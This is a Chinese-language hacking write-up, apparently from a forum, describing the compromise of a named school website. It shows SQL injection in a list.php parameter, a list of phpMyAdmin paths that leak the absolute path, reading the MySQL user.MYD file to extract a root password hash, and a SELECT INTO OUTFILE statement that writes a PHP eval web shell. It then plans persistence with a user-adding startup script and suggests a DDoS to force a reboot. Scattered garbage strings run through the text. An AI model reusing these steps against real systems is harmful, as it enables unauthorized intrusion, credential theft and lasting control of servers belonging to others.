第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
u( }1 z5 |* i' @# G; t发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
; u$ }' w. F" f/ t3 @
4 |, g/ f2 Y. d# z% ]7 h7 c
1 n. G: x$ ?3 X9 p+ Z( T
& [3 k# ?4 M+ A4 G5 u1 s; q# d常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
* o2 \/ n- H6 Y9 z% k
9 E( h8 f1 v: @# K! V. n* Z那么想可以直接写入shell ,getshell有几个条件:
1 C3 F# G$ @: A; Q3 S1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
) I/ K% S0 e, e2 C, I R
8 _! M6 o _4 Y4 s试着爆绝对路径:
6 ~8 P- i! V* |% H1./phpMyAdmin/index.php?lang[]=1
& k) u4 X* U1 ]% A+ Y2 P. ]2./phpMyAdmin/phpinfo.php
& M8 I- J2 S8 X/ t7 Z) F3./load_file() 6 r7 G# i! A9 {
4./phpmyadmin/themes/darkblue_orange/layout.inc.php : p5 C! n* t, d% c; I
5./phpmyadmin/libraries/select_lang.lib.php N- o; T5 H+ t9 Y
6./phpmyadmin/libraries/lect_lang.lib.php
: [, |3 U9 ~" C% ?9 D7./phpmyadmin/libraries/mcrypt.lib.php # [& m' A! j$ ~
8./phpmyadmin/libraries/export/xls.php ) N, J T( q3 O3 }5 t
0 v( }, X1 k" L5 P
均不行...........................
6 r! {3 K9 _9 h
6 ^" C- n, s$ T御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
: ~8 M$ c: F$ h0 j0 ]6 ?. V/ ~: V* n; s6 L+ z! ~, W8 k
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 9 t: C9 m; e3 R7 ~) q% @
* u% M K8 t, e; E T默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 6 X b! y2 I! A0 I
6 t4 M+ _0 O! s2 q6 T- ^* q0 P* U敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
8 a7 x$ E5 m; }4 i; G8 [9 G
1 d3 @) @) ]2 ^3 U想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
) ?& W1 P& D: o* |
5 N( ^4 P3 i0 G+ C2 ]http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ; y/ {. s; a/ U6 B B8 Q% g
7 g0 ?) d! Z" @" }/ M' c* l自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD % |: ?% P2 ]0 d, c% W6 \! z
* b% `4 M9 w' V2 T" ^" E: w0 _' J' b
成功读到root密码: ; h% Y( i1 d% e# H8 [0 r! ?
4 b4 h) T+ c# S% r17---- r(0072) ; [. D$ x9 B! W3 z6 g4 ^; M# ^
18---- o(006f)
* }/ j' v* s( c19---- o(006f) : @6 W$ l: @* S- u5 Q7 ]# p1 n
20---- t(0074) ' h) S3 X1 s3 G8 K7 m
21---- *(002a)
5 t) H7 c. s" k" k+ J$ o' a+ I22---- 8(0038) / r, H' ]: L% K
23---- 2(0032)
* S; |, H) O; Z24---- E(0045)
& T8 R% T& n" a& c. `25---- 1(0031)
) D* J9 y" X/ ]7 y. c$ @26---- C(0043) + ]0 [2 u$ r# O ?6 j. j
27---- 5(0035)
5 @7 B) [$ X8 o/ v G+ w28---- 8(0038)
0 o0 n5 e% Y$ G3 X4 B1 u29---- 2(0032)
' h6 B8 ~& F) | Z30---- 8(0038)
! s$ k! \2 Y; t31---- A(0041) 3 Z& Y; g% R) Y: ?' I' ?. T7 V
32---- 9(0039) ! t7 j! G9 o$ R6 k1 E4 G* c' w& ?
33---- B(0042)
$ a# k; [& J) A( M34---- 5(0035) 5 P# L' W7 q3 O/ r: l7 o2 e- X8 d
35---- 4(0034)
1 F1 x* W* c; C0 P5 x36---- 8(0038) 7 B& ]) `" c4 `6 G# z( u
37---- 6(0036)
( O$ m1 _! d, h. ?- c/ l38---- 4(0034) ! ]$ D3 y4 @( Q" j0 T" F+ p/ t. c
39---- 9(0039)
. t) S Z$ ]. A40---- 1(0031) 6 W+ Q: m7 r5 q+ I5 E+ H* Q
41---- 1(0031) 5 V! Y' f' V) O1 n. ~: c# m
42---- 5(0035) + z: h0 F+ [: [. N+ D2 v- E
43---- 3(0033)
1 V( [( R% y% L/ z# b44---- 5(0035) & V; w e7 f1 T' x* I$ D* t
45---- 9(0039) , z5 V1 _& Y( k- m( X; M- C
46---- 8(0038) 8 `) M& Y A7 F0 m( {/ r
47---- F(0046) 3 h6 e' Q7 D# ~) b5 z* K3 I
48---- F(0046) 9 B3 z1 `& E( W- J$ ~- ?4 x( q
49---- 4(0034)
7 Z+ }+ h- c; b. I50---- F(0046)
) M% n. H5 z$ y6 D& v1 p1 b5 r51---- 0(0030) 1 X) e$ Y5 j) H4 }& A+ p( b
52---- 3(0033)
$ b+ N8 L1 s" a# I: S2 I: Q53---- 2(0032)
+ J: L0 w, P, w; d6 J3 W& s54---- A(0041) * t2 v7 ?+ ~* V2 m4 f3 U* i- C. x
55---- 4(0034)
8 B2 ?' ^- M1 v56---- A(0041)
% @4 f! N( m5 N5 b5 P57---- B(0042)
" S( R) A X- O% T9 o* v58---- *(0044) & |' k% t5 c1 \% ?# Q: g7 ?
59---- *(0035)
* s h( \6 _; T! ?# a' m60---- *(0041)
2 P4 }; L4 Z* g3 q' b61---- *0032)
% {" |; m! J! G1 g- D) y3 h8 `) q6 Z9 {% E7 @
解密后成功登陆phpmyamin . H; X7 }, @4 \" s; d: W
8 S" p- Z+ z+ X! _* L
6 H+ c3 k2 d w, X" ]7 N2 B2 D- @
1 e5 b2 @; f' O9 m7 S7 M, d9 R' f. b& ` c* j2 `1 y) M
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
& f+ L& k i8 _. M( K
- B; n3 u9 ? X$ O( o0 d成功执行,拿下shell,菜刀连接: - }6 @' ~% e/ h9 x) G6 z q
" z/ a6 h, H C3 n$ h" K3 ~服务器不支持asp,aspx,php提权无果................... ! t. p! N' }- Q( |" A
5 @# v* ~0 j6 D1 O5 _* R: x5 \
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 3 z( i8 V, \7 [) z" Z' S2 g1 t
服务器上已经有个隐藏帐号了
e: m0 u4 u4 O7 R1 J# h别名 administrators* I; T9 I4 K0 b
注释 管理员对计算机/域有不受限制的完全访问权 / N7 f& p0 ?) a
成员 2 ^7 D6 G6 r8 n9 o. R; Y
-------------------------------------------------------------------------------
I! [7 O" L1 U2 S* Yadmin
+ ?# _. O1 ?0 S* [& B# Y U7 fAdministrator3 G; p6 F1 S, T) G+ l
slipper$2 o' @ U, O$ L, }
sqluser3 Q4 z J. F' `# u5 T' ]6 Q' t: f2 K
命令成功完成。 : T! d) n' [& ~1 E5 |/ i6 Z
7 A( j. ~$ d S7 E# k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
% v+ ]5 X# n9 l8 n( v! X
# [, s9 Q5 }9 F) m) ]2 `3 kddos服务器重启,不然就只能坐等服务器重启了...............................- K7 E* m" @0 S1 m, K3 i
: @2 H1 b( _% z( |3 A" I/ X
" m6 {! Z- H9 B |